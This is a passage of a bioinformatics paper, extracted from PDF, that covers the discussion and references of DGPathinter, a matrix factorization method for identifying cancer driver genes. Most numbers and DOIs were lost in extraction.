akt signaling biocarta met pathway kegg endometrial cancer reactome further platelet releasate reactome pi k akt signalling reactome signaling by egfr xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion in this paper, we propose a knowledge-driven matrix factorization framework called dgpathinter to identify driver genes from mutation data with prior knowledge from interactome and pathways incorporated. the knowledge of pathways is incorporated by maximizing the correlation between the pathway scores and their relations of mutation scores (chen & zhang, ). meanwhile, the knowledge of interactome is utilized by graph laplacian regularization with the gene interaction network. to integrate the information from pathways, interactome and mutation data, matrix factorization framework is adopted, which can also help addressing the problem of tumor sample heterogeneity. when comparing dgpathinter with three existing methods on three tcga cancer mutation datasets (brca, gbm and thca), we observe that dgpathinter achieves better performance than the other competing methods on precision–recall curves. the average ranks of known driver genes prioritized by dgpathinter are also smaller than those of the other existing methods. the top ranked genes detected by dgpathinter are highly enriched for the known driver genes when analyzed by fisher’s exact test, and the p values for dgpathinter are also more significant than those of the other investigated methods. while some known driver genes are shared in the detection results of dgpathinter and the existing methods, dgpathinter also identifies some known driver genes that are not detected by the other investigated methods. in addition, most of the top ranked scored pathways in the results of dgpathinter are cancer progression- associated pathways. the promising performance of dgpathinter in the identification of driver genes may be due to three potential reasons. first, prior knowledge from pathways is important for understanding the roles of genes in tumors (parsons et al., ; cancer genome atlas research network, ; vaske et al., ), and incorporating information from pathways has the potential of promoting the detection power of driver genes. second, since the cooperatively dysregulated genes are correlated with cancer formation and progression (vandin, upfal & raphael, ; leiserson et al., ; hofree et al., ; cho et al., ), gene interaction network information from interactome can help in determining the influence of somatic mutations between the interacted genes. third, the sample heterogeneity issue that driver genes may mutate in different samples is reported as a confounding factor in driver gene identification (cancer genome atlas network, ), and matrix factorization framework is capable of analyzing heterogeneous samples (lee et al., ; sill et al., ; xi & li, ). to investigate the individual contribution of network information or pathway information on the performance of our method, we calculate the results with only the network information, the results with only the pathway information and the results with no prior information (i.e., matrix factorization) by removing the two terms of pathway information, the term of network regularization and all the three terms of prior information respectively. through the evaluation results in figs. s and s , we can see that the results with prior information from both network and pathways achieve better performance than the results with only network information, the results with only pathway information, and the results with no xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ prior information. these comparison results indicate that the detection results of our methods are contributed by the prior knowledge coming from networks and pathways. note that the previous network-based methods can incorporate pathway information when they use network that contains interaction data derived from pathway databases, such as public molecular interaction database string. in comparison, irefindex is an interaction database that only assembles data from other primary interaction databases, but does not provide the coverage of pathway interactions that is offered by string. therefore, we compare our method against the previous network-based approaches by using string instead of irefindex. the comparison results with the usage of string are evaluated by precision–recall curves (fig. s for cgc and s for ncg . ), the average ranks of known cancer genes (table s for cgc and ncg . ) and the proportions of known cancer genes in the top genes with p values of fisher’s exact test (fig. s for cgc and ncg . ). we observe that the performance of hotnet and muffinn-dnsum with string are increased when compared with their performance with irefindex. this phenomenon may be due to the fact that irefindex does not provide the coverage of pathway interactions that is offered by string. for dgpathinter, the detection results still outperform those of the other network-based methods when string is used. when we further apply the statistical validation on the detection results of these competing methods with string, the validation results of the friedman test demonstrate that the difference between the detection results of the investigated methods is statistically significant (details in supplemental information). consequently, our approach provides an added value over previous network-based approaches through the use of information on pathway boundaries, which is not explicitly included in string. despite the achievement, there are also some questions for further investigation. since there seems to be a bias among network-based driver gene identification methods where hot nodes and their neighbors are always identified as candidate drivers, we further investigate how many of the top dgpathinter-output genes are neighbors of tp . for brca, gbm and thca, the numbers of the top genes detected by dgpathinter that are also neighbors of tp are , and , respectively, which is much less than (the number of neighbors of tp in irefindex). accordingly, it seems that the results of dgpathinter are less affected by the bias among network-based driver gene identification methods. furthermore, there is a possibility that some genes may contain both driver and passenger mutations, and this problem is not addressed in the experimental design in our work. the current approach focuses on gene-level predictions, and it cannot yet make predictions at the level of individual mutations. in fig. s , using network information does not change the performance for the datasets of the three types of cancers. when we further investigate this phenomenon, we find that some non-benchmarking genes included in top ranked genes in the result with network information are different than those in the result with no prior information, although the known benchmarking genes included in the two results are the same. in addition, a possible expansion to dgpathinter would be to integrate multi-omic data from not only mutations but also from copy number alternation, gene expression and dna methylation of genes, which also play xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ important roles in activating oncogenes and inactivating tumor suppressors (yang et al., ). another interesting topic for future work is to generalize the framework of dgpathinter to pan-cancer analysis, in which the samples of numerous different cancer types is combined as one large dataset and some driver genes across many types of cancers will be identified in this case (leiserson et al., ). in conclusion, dgpathinter is an efficient method for prioritizing driver genes, and yields a sophisticated perspective of cancer genome by utilizing prior knowledge from interactome and pathways. acknowledgements we would like to thank changran zhang and the anonymous reviewers for insight and help with revisions of this manuscript. additional information and declarations funding this work was supported by the national natural science foundation of china (nos. , and ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: , and . competing interests the authors declare that they have no competing interests. author contributions � jianing xi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � minghui wang conceived and designed the experiments, analyzed the data and reviewed drafts of the paper. � ao li wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/ustc-hilab/dgpathinter supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ustc-hilab/dgpathinter http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references an o, pendino v, d’antonio m, ratti e, gentilini m, ciccarelli fd. . ncg . : the network of cancer genes in the era of massive mutational screenings of cancer genomes. database : bau doi . /database/bau . bashashati a, haffari g, ding j, ha g, lui k, rosner j, huntsman dg, caldas c, aparicio sa, shah sp. . drivernet: uncovering the impact of somatic driver mutations on transcriptional networks in cancer. genome biology ( ):r doi . /gb- - - -r . bertrand d, chng kr, sherbaf fg, kiesel a, chia bkh, sia yy, huang sk, hoon dsb, liu et, hillmer a, nagarajan n. . patient-specific driver gene prediction and risk assessment through integrated network analysis of cancer omics profiles. nucleic acids research ( ): e –e doi . /nar/gku . cancer genome atlas network. . comprehensive molecular portraits of human breast tumours. nature ( ): – doi . /nature . cancer genome atlas research network. . comprehensive genomic characterization defines human glioblastoma genes and core pathways. nature ( ): doi . /nature . cancer genome atlas research network. . integrated genomic characterization of papillary thyroid carcinoma. cell ( ): – doi . /j.cell. . . . chen j, zhang s. . integrative analysis for identifying joint modular patterns of gene- expression and drug-response data. bioinformatics ( ): – doi . /bioinformatics/btw . cho a, shim je, kim e, supek f, lehner b, lee i. . muffinn: cancer gene discovery via network analysis of somatic mutation data. genome biology ( ): doi . /s - - -x. chow lm, endersby r, zhu x, rankin s, qu c, zhang j, broniscer a, ellison dw, baker sj. . cooperativity within and among pten, p , and rb pathways induces high-grade astrocytoma in adult brain. cancer cell ( ): – doi . /j.ccr. . . . das j, yu h. . hint: high-quality protein interactomes and their applications in understanding human disease. bmc systems biology ( ): doi . / - - - . dees nd, zhang q, kandoth c, wendl mc, schierding w, koboldt dc, mooney tb, callaway mb, dooling d, mardis er, wilson rk, ding l. . music: identifying mutational significance in cancer genomes. genome research ( ): – doi . /gr. . . futreal pa, coin l, marshall m, down t, hubbard t, wooster r, rahman n, stratton mr. . a census of human cancer genes. nature reviews cancer ( ): – doi . /nrc . gao j, aksoy ba, dogrusoz u, dresdner g, gross b, sumer so, sun y, jacobsen a, sinha r, larsson e, cerami e, sander c, schultz n. . integrative analysis of complex cancer genomics and clinical profiles using the cbioportal. science signaling ( ):pl doi . /scisignal. . gargi u, kasturi r. . image database querying using a multi-scale localized color representation. in proceedings ieee workshop on content-based access of image and video libraries (cbaivl’ ). piscataway: ieee, – . gaynor ku, grigorieva iv, allen md, esapa ct, head ra, gopinath p, christie pt, nesbit ma, jones jl, thakker rv. . gata mutations found in breast cancers may be associated with xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /database/bau http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /j.ccr. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /nrc http://dx.doi.org/ . /scisignal. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aberrant nuclear localization, reduced transactivation and cell invasiveness. hormones and cancer ( ): – doi . /s - - -x. hofree m, shen jp, carter h, gross a, ideker t. . network-based stratification of tumor mutations. nature methods ( ): – doi . /nmeth. . hou jp, ma j. . dawnrank: discovering personalized driver genes in cancer. genome medicine ( ): doi . /s - - - . hua x, xu h, yang y, zhu j, liu p, lu y. . drgap: a powerful tool for identifying driver genes and pathways in cancer sequencing studies. american journal of human genetics ( ): – doi . /j.ajhg. . . . hudson tj, anderson w, aretz a, barker ad, bell c, bernabé rr, bhan mk, calvo f, eerola i, gerhard ds, guttmacher a, guyer m, hemsley fm, jennings jl, kerr d, klatt p, kolar p, kusada j, lane dp, laplace f, youyong l, nettekoven g, ozenberger b, peterson j, rao ts, remacle j, schafer aj, shibata t, stratton mr, vockley jg, watanabe k, yang h, yuen mm, knoppers bm, bobrow m, cambon-thomsen a, dressler lg, dyke so, joly y, kato k, kennedy kl, nicolás p, parker mj, rial-sebbag e, romeo-casabona cm, shaw km, wallace s, wiesner gl, zeps n, lichter p, biankin av, chabannon c, chin l, clément b, de alava e, degos f, ferguson ml, geary p, hayes dn, hudson tj, johns al, kasprzyk a, nakagawa h, penny r, piris ma, sarin r, scarpa a, shibata t, van de vijver m, futreal pa, aburatani h, bayés m, botwell dd, campbell pj, estivill x, gerhard ds, grimmond sm, gut i, hirst m, lópez-otı́n c, majumder p, marra m, mcpherson jd, nakagawa h, ning z, puente xs, ruan y, shibata t, stratton mr, stunnenberg hg, swerdlow h, velculescu ve, wilson rk, xue hh, yang l, spellman pt, bader gd, boutros pc, campbell pj, flicek p, getz g, guigó r, guo g, haussler d, heath s, hubbard tj, jiang t, jones sm, li q, lópez-bigas n, luo r, muthuswamy l, ouellette bf, pearson jv, puente xs, quesada v, raphael bj, sander c, shibata t, speed tp, stein ld, stuart jm, teague jw, totoki y, tsunoda t, valencia a, wheeler da, wu h, zhao s, zhou g, stein ld, guigó r, hubbard tj, joly y, jones sm, kasprzyk a, lathrop m, lópez-bigas n, ouellette bf, spellman pt, teague jw, thomas g, valencia a, yoshida t, kennedy kl, axton m, dyke so, futreal pa, gerhard ds, gunter c, guyer m, hudson tj, mcpherson jd, miller lj, ozenberger b, shaw km, kasprzyk a, stein ld, zhang j, haider sa, wang j, yung ck, cros a, liang y, gnaneshan s, guberman j, hsu j, bobrow m, chalmers dr, hasel kw, joly y, kaan ts, kennedy kl, knoppers bm, lowrance ww, masui t, nicolás p, rial-sebbag e, rodriguez ll, vergely c, yoshida t, grimmond sm, biankin av, bowtell dd, cloonan n, defazio a, eshleman jr, etemadmoghadam d, gardiner bb, kench jg, scarpa a, sutherland rl, tempero ma, waddell nj, wilson pj, mcpherson jd, gallinger s, tsao ms, shaw pa, petersen gm, mukhopadhyay d, chin l, depinho ra, thayer s, muthuswamy l, shazand k, beck t, sam m, timms l, ballin v, lu y, ji j, zhang x, chen f, hu x, zhou g, yang q, tian g, zhang l, xing x, li x, zhu z, yu y, yu j, yang h, lathrop m, tost j, brennan p, holcatova i, zaridze d, brazma a, egevard l, prokhortchouk e, banks re, uhlén m, cambon-thomsen a, viksna j, ponten f, skryabin k, stratton mr, futreal pa, birney e, borg a, børresen-dale al, caldas c, foekens ja, martin s, reis-filho js, richardson al, sotiriou c, stunnenberg hg, thoms g, van de vijver m, van’t veer l, calvo f, birnbaum d, blanche h, boucher p, boyault s, chabannon c, gut i, masson-jacquemier jd, lathrop m, pauporté i, pivot x, vincent-salomon a, tabone e, theillet c, thomas g, tost j, treilleux i, calvo f, bioulac-sage p, clément b, decaens t, degos f, franco d, gut i, gut m, heath s, lathrop m, samuel d, thomas g, zucman-rossi j, lichter p, eils r, brors b, korbel jo, korshunov a, landgraf p, lehrach h, pfister s, radlwimmer b, reifenberger g, taylor md, von kalle c, majumder pp, sarin r, rao ts, bhan mk, scarpa a, pederzoli p, lawlor ra, delledonne m, bardelli a, xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ajhg. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ biankin av, grimmond sm, gress t, klimstra d, zamboni g, shibata t, nakamura y, nakagawa h, kusada j, tsunoda t, miyano s, aburatani h, kato k, fujimoto a, yoshida t, campo e, lópez-otı́n c, estivill x, guigó r, de sanjosé s, piris ma, montserrat e, gonzález- dı́az m, puente xs, jares p, valencia a, himmelbauer h, quesada v, bea s, stratton mr, futreal pa, campbell pj, vincent-salomon a, richardson al, reis-filho js, van de vijver m, thomas g, masson-jacquemier jd, aparicio s, borg a, børresen-dale al, caldas c, foekens ja, stunnenberg hg, van’t veer l, easton df, spellman pt, martin s, barker ad, chin l, collins fs, compton cc, ferguson ml, gerhard ds, getz g, gunter c, guttmacher a, guyer m, hayes dn, lander es, ozenberger b, penny r, peterson j, sander c, shaw km, speed tp, spellman pt, vockley jg, wheeler da, wilson rk, hudson tj, chin l, knoppers bm, lander es, lichter p, stein ld, stratton mr, anderson w, barker ad, bell c, bobrow m, burke w, collins fs, compton cc, depinho ra, easton df, futreal pa, gerhard ds, green ar, guyer m, hamilton sr, hubbard tj, kallioniemi op, kennedy kl, ley tj, liu et, lu y, majumder p, marra m, ozenberger b, peterson j, schafer aj, spellman pt, stunnenberg hg, wainwright bj, wilson rk, yang h. . international network of cancer genome projects. nature ( ): – doi . /nature . jia p, zhao z. . varwalker: personalized mutation network analysis of putative cancer genes from next-generation sequencing data. plos computational biology ( ):e doi . /journal.pcbi. . joshi-tope g, gillespie m, vastrik i, d’eustachio p, schmidt e, de bono b, jassal b, gopinath gr, wu gr, matthews l, lewis s, birney e, stein l. . reactome: a knowledgebase of biological pathways. nucleic acids research (suppl_ ):d –d doi . /nar/gki . kandoth c, mclellan md, vandin f, ye k, niu b, lu c, xie m, zhang q, mcmichael jf, wyczalkowski ma, leiserson mdm, miller ca, welch js, walter mj, wendl mc, ley tj, wilson rk, raphael bj, ding l. . mutational landscape and significance across major cancer types. nature ( ): – doi . /nature . khurana e, fu y, chen j, gerstein m. . interpretation of genomic variants using a unified biological network approach. plos computational biology ( ):e doi . /journal.pcbi. . kim s, sael l, yu h. . a mutation profile for top-k patient search exploiting gene-ontology and orthogonal non-negative matrix factorization. bioinformatics ( ): – doi . /bioinformatics/btv . lawrence ms, stojanov p, mermel ch, garraway la, golub tr, meyerson m, gabriel sb, lander es, getz g. . discovery and saturation analysis of cancer genes across tumor types. nature ( ): – doi . /nature . lawrence ms, stojanov p, polak p, kryukov gv, cibulskis k, sivachenko a, carter sl, stewart c, mermel ch, roberts sa, kiezun a, hammerman ps, mckenna a, drier y, zou l, ramos ah, pugh tj, stransky n, helman e, kim j, sougnez c, ambrogio l, nickerson e, shefler e, cortés ml, auclair d, saksena g, voet d, noble m, dicara d, lin p, lichtenstein l, heiman di, fennell t, imielinski m, hernandez b, hodis e, baca s, dulak am, lohr j, landau da, wu cj, melendez-zajgla j, hidalgo-miranda a, koren a, mccarroll sa, mora j, crompton b, onofrio r, parkin m, winckler w, ardlie k, gabriel sb, roberts cwm, biegel ja, stegmaier k, bass aj, garraway la, meyerson m, golub tr, gordenin da, sunyaev s, lander es, getz g. . mutational heterogeneity in cancer and the search for new cancer-associated genes. nature ( ): – doi . /nature . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nature http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . /nature http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee i, blom um, wang pi, shim je, marcotte em. . prioritizing candidate disease genes by network-based boosting of genome-wide association data. genome research ( ): – doi . /gr. . . lee m, shen h, huang jz, marron js. . biclustering via sparse singular value decomposition. biometrics ( ): – . leiserson md, vandin f, wu h-t, dobson jr, raphael br. . pan-cancer identification of mutated pathways and protein complexes. cancer research ( supplement): – doi . / - .am - . li f, gao l, ma x, yang x. . detection of driver pathways using mutated gene network in cancer. molecular biosystems ( ): – doi . /c mb c. ma w-y, zhang hj. . benchmarking of image features for content-based retrieval. in conference record of the thirty-second asilomar conference on signals, systems & computers, , pacific grove, usa. vol. . ieee, – . ma x, tang w, wang p, guo x, gao l. . extracting stage-specific and dynamic modules through analyzing multiple networks associated with cancer progression. ieee/acm transactions on computational biology and bioinformatics. piscataway & new york: ieee/acm. malioutov d, malyutov m. . boolean compressed sensing: lp relaxation for group testing. in ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . müller h, müller w, squire dm, marchand-maillet s, pun t. . performance evaluation in content-based image retrieval: overview and proposals. pattern recognition letters ( ): – doi . /s - ( ) - . ng s, collisson ea, sokolov a, goldstein t, gonzalez-perez a, lopez-bigas n, benz c, haussler d, stuart jm. . paradigm-shift predicts the function of mutations in multiple cancers using pathway impact analysis. bioinformatics ( ):i –i doi . /bioinformatics/bts . nishimura d. . biocarta. biotech software & internet report ( ): – doi . / . ogata h, goto s, sato k, fujibuchi w, bono h, kanehisa m. . kegg: kyoto encyclopedia of genes and genomes. nucleic acids research ( ): – doi . /nar/ . . . pan r, zhou y, cao b, liu nn, lukose r, scholz m, yang q. . one-class collaborative filtering. in eighth ieee international conference on data mining, . icdm’ , pisa, italy. ieee, – . park s, kim s-j, yu d, pena-llopis s, gao j, park js, chen b, norris j, wang x, chen m, kim m, yong j, wardak z, choe ks, story m, starr tk, cheong j-h, hwang th. . an integrative somatic mutation analysis to identify pathways linked with survival outcomes across cancer types. bioinformatics ( ): – doi . /bioinformatics/btv . parsons dw, jones s, zhang x, lin jc-h, leary rj, angenendt p, mankoo p, carter h, siu i-m, gallia gl. . an integrated genomic analysis of human glioblastoma multiforme. science ( ): – . prasad tsk, goel r, kandasamy k, keerthikumar s, kumar s, mathivanan s, telikicherla d, raju r, shafreen b, venugopal a, balakrishnan l, marimuthu a, banerjee s, somanathan ds, sebastian a, rani s, ray s, harrys kishore cj, kanth s, ahmed m, kashyap mk, mohmood r, ramachandra yl, krishna v, abdul rahiman b, mohan s, ranganathan p, ramabadran s, chaerkady r, pandey a. . human protein reference database- update. nucleic acids research (suppl ):d –d doi . /nar/gkn . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gr. . http://dx.doi.org/ . / - .am - http://dx.doi.org/ . /c mb c http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . / http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ raphael bj, dobson jr, oesper l, vandin f. . identifying driver mutations in sequenced cancer genomes: computational approaches to enable precision medicine. genome medicine ( ): doi . /gm . razick s, magklaras g, donaldson im. . irefindex: a consolidated protein interaction database with provenance. bmc bioinformatics ( ): doi . / - - - . schuster sc. . next-generation sequencing transforms today’s biology. nature ( ): – doi . /nmeth . sherr cj, mccormick f. . the rb and p pathways in cancer. cancer cell ( ): – . shi k, gao l, wang b. . discovering potential cancer driver genes by an integrated network-based approach. molecular biosystems ( ): – doi . /c mb a. sill m, kaiser s, benner a, kopp-schneider a. . robust biclustering by sparse singular value decomposition incorporating stability selection. bioinformatics ( ): – . sjöblom t, jones s, wood ld, parsons dw, lin j, barber td, mandelker d, leary rj, ptak j, silliman n, szabo s, buckhaults p, farrell c, meeh p, markowitz sd, willis j, dawson d, willson jk, gazdar af, hartigan j, wu l, liu c, parmigiani g, park bh, bachman ke, papadopoulos n, vogelstein b, kinzler kw, velculescu ve. . the consensus coding sequences of human breast and colorectal cancers. science ( ): – . subramanian a, tamayo p, mootha vk, mukherjee s, ebert bl, gillette ma, paulovich a, pomeroy sl, golub tr, lander es, mesirov jp. . gene set enrichment analysis: a knowledge-based approach for interpreting genome-wide expression profiles. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . szklarczyk d, franceschini a, kuhn m, simonovic m, roth a, minguez p, doerks t, stark m, muller j, bork p, jensen lj, von mering c. . the string database in : functional interaction networks of proteins, globally integrated and scored. nucleic acids research (suppl ):d –d doi . /nar/gkq . tamborero d, gonzalez-perez a, perez-llamas c, deu-pons j, kandoth c, reimand j, lawrence ms, getz g, bader gd, ding l, lopez-bigas n. . comprehensive identification of mutational cancer driver genes across tumor types. scientific reports : doi . /srep . tu m, li z, liu x, lv n, xi c, lu z, wei j, song g, chen j, guo f, jiang k, wang s, gao w, miao y. . vasohibin promotes epithelial-mesenchymal transition in human breast cancer via activation of transforming growth factor b and hypoxia dependent repression of gata-binding factor . cancer letters : – doi . /j.canlet. . . . usary j, llaca v, karaca g, presswala s, karaca m, he x, langerød a, kåresen r, oh ds, dressler lg, lønning pe, strausberg rl, chanock s, børresen-dale al, perou cm. . mutation of gata in human breast tumors. oncogene ( ): doi . /sj.onc. . vandin f, upfal e, raphael bj. . algorithms for detecting significantly mutated pathways in cancer. journal of computational biology ( ): – doi . /cmb. . . vaske cj, benz sc, sanborn jz, earl d, szeto c, zhu j, haussler d, stuart jm. . inference of patient-specific pathway activities from multi-dimensional cancer genomics data using paradigm. bioinformatics ( ):i –i doi . /bioinformatics/btq . vogelstein b, papadopoulos n, velculescu ve, zhou s, diaz la, kinzler kw. . cancer genome landscapes. science ( ): – doi . /science. . weinstein jn, collisson ea, mills gb, shaw krm, ozenberger ba, ellrott k, shmulevich i, sander c, stuart jm, cancer genome atlas research network, chang k, creighton cj, xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gm http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nmeth http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /srep http://dx.doi.org/ . /j.canlet. . . http://dx.doi.org/ . /sj.onc. http://dx.doi.org/ . /cmb. . http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ davis c, donehower l, drummond j, wheeler d, ally a, balasundaram m, birol i, butterfield sn, chu a, chuah e, chun hj, dhalla n, guin r, hirst m, hirst c, holt ra, jones sj, lee d, li hi, marra ma, mayo m, moore ra, mungall aj, robertson ag, schein je, sipahimalani p, tam a, thiessen n, varhol rj, beroukhim r, bhatt as, brooks an, cherniack ad, freeman ss, gabriel sb, helman e, jung j, meyerson m, ojesina ai, pedamallu cs, saksena g, schumacher se, tabak b, zack t, lander es, bristow ca, hadjipanayis a, haseley p, kucherlapati r, lee s, lee e, luquette lj, mahadeshwar hs, pantazi a, parfenov m, park pj, protopopov a, ren x, santoso n, seidman j, seth s, song x, tang j, xi r, xu aw, yang l, zeng d, auman jt, balu s, buda e, fan c, hoadley ka, jones cd, meng s, mieczkowski pa, parker js, perou cm, roach j, shi y, silva go, tan d, veluvolu u, waring s, wilkerson md, wu j, zhao w, bodenheimer t, hayes dn, hoyle ap, jeffreys sr, mose le, simons jv, soloway mg, baylin sb, berman bp, bootwalla ms, danilova l, herman jg, hinoue t, laird pw, rhie sk, shen h, triche t jr, weisenberger dj, carter sl, cibulskis k, chin l, zhang j, getz g, sougnez c, wang m, saksena g, carter sl, cibulskis k, chin l, zhang j, getz g, dinh h, doddapaneni hv, gibbs r, gunaratne p, han y, kalra d, kovar c, lewis l, morgan m, morton d, muzny d, reid j, xi l, cho j, dicara d, frazer s, gehlenborg n, heiman di, kim j, lawrence ms, lin p, liu y, noble ms, stojanov p, voet d, zhang h, zou l, stewart c, bernard b, bressler r, eakin a, iype l, knijnenburg t, kramer r, kreisberg r, leinonen k, lin j, liu y, miller m, reynolds sm, rovira h, shmulevich i, thorsson v, yang d, zhang w, amin s, wu cj, wu cc, akbani r, aldape k, baggerly ka, broom b, casasent td, cleland j, creighton c, dodda d, edgerton m, han l, herbrich sm, ju z, kim h, lerner s, li j, liang h, liu w, lorenzi pl, lu y, melott j, mills gb, nguyen l, su x, verhaak r, wang w, weinstein jn, wong a, yang y, yao j, yao r, yoshihara k, yuan y, yung ak, zhang n, zheng s, ryan m, kane dw, aksoy ba, ciriello g, dresdner g, gao j, gross b, jacobsen a, kahles a, ladanyi m, lee w, lehmann kv, miller ml, ramirez r, rätsch g, reva b, sander c, schultz n, senbabaoglu y, shen r, sinha r, sumer so, sun y, taylor bs, weinhold n, fei s, spellman p, benz c, carlin d, cline m, craft b, ellrott k, goldman m, haussler d, ma s, ng s, paull e, radenbaugh a, salama s, sokolov a, stuart jm, swatloski t, uzunangelov v, waltman p, yau c, zhu j, hamilton sr, getz g, sougnez c, abbott s, abbott r, dees nd, delehaunty k, ding l, dooling dj, eldred jm, fronick cc, fulton r, fulton ll, kalicki-veizer j, kanchi kl, kandoth c, koboldt dc, larson de, ley tj, lin l, lu c, magrini vj, mardis er, mclellan md, mcmichael jf, miller ca, o’laughlin m, pohl c, schmidt h, smith sm, walker j, wallis jw, wendl mc, wilson rk, wylie t, zhang q, burton r, jensen ma, kahn a, pihl t, pot d, wan y, levine da, black ad, bowen j, frick j, gastier-foster jm, harper ha, helsel c, leraas km, lichtenberg tm, mcallister c, ramirez nc, sharpe s, wise l, zmuda e, chanock sj, davidsen t, demchok ja, eley g, felau i, ozenberger ba, sheth m, sofia h, staudt l, tarnuzzer r, wang z, yang l, zhang j, omberg l, margolin a, raphael bj, vandin f, wu ht, leiserson md, benz sc, vaske cj, noushmehr h, knijnenburg t, wolf d, van’t veer l, collisson ea, anastassiou d, ou yang th, lopez-bigas n, gonzalez-perez a, tamborero d, xia z, li w, cho dy, przytycka t, hamilton m, mcguire s, nelander s, johansson p, jörnsten r, kling t, sanchez j. . the cancer genome atlas pan- cancer analysis project. nature genetics ( ): – doi . /ng. . wu h-t, hajirasouliha i, raphael bj. . detecting independent and recurrent copy number aberrations using interval graphs. bioinformatics ( ):i –i doi . /bioinformatics/btu . xi j, li a. . discovering recurrent copy number aberrations in complex patterns via non- negative sparse singular value decomposition. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ng. http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xi j, li a, wang m. . a novel network regularized matrix decomposition method to detect mutated cancer genes in tumour samples with inter-patient heterogeneity. scientific reports ( ): doi . /s - - -w. xie b, wang m, tao d. . toward the optimization of normalized graph laplacian. ieee transactions on neural networks ( ): – doi . /tnn. . . xiong m, zhao z, arnold j, yu f. . next-generation sequencing. journal of biomedicine and biotechnology : doi . / / . yang h, wei q, zhong x, yang h, li b. . cancer driver gene discovery through an integrative genomics approach in a non-parametric bayesian framework. bioinformatics ( ): – . youn a, simon r. . identifying cancer driver genes in tumor genome sequencing studies. bioinformatics ( ): – doi . /bioinformatics/btq . zhao m, wang q, wang q, jia p, zhao z. . computational tools for copy number variation (cnv) detection using next-generation sequencing data: features and perspectives. bmc bioinformatics ( ): doi . / - - -s -s . zhou x, liu j, wan x, yu w. . piecewise-constant and low-rank approximation for identification of recurrent copy number variations. bioinformatics ( ): – doi . /bioinformatics/btu . zhou x, yang c, wan x, zhao h, yu w. . multisample acgh data analysis via total variation and spectral regularization. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /tnn. . http://dx.doi.org/ . / / http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dgpathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways ... introduction materials and methods results discussion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true 